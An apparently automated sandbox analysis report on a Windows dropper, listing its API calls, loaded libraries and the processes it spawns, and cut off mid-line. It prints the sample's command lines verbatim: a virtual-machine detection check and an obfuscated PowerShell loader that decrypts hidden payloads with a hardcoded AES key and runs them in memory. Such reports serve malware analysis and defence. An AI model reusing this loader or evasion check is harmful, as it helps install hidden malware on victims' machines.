                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF776D16F14
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF776D11BF4
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF776D16F14
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D12F7B CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF776D12F7B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\7749332
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3352
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
                    Source: XgKnAQpuPM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                    Source: unknownProcess created: C:\Users\user\Desktop\XgKnAQpuPM.exe "C:\Users\user\Desktop\XgKnAQpuPM.exe"
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeSection loaded: feclient.dllJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeSection loaded: advpack.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: XgKnAQpuPM.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: XgKnAQpuPM.exeStatic file information: File size 3571712 > 1048576
                    Source: XgKnAQpuPM.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x359000
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: XgKnAQpuPM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: XgKnAQpuPM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
                    Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: XgKnAQpuPM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: XgKnAQpuPM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: XgKnAQpuPM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: XgKnAQpuPM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: XgKnAQpuPM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs.Net Code: _F6A9_24CA_2622_EF60_FFFD System.Reflection.Assembly.Load(byte[])
                    Suspicious command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object 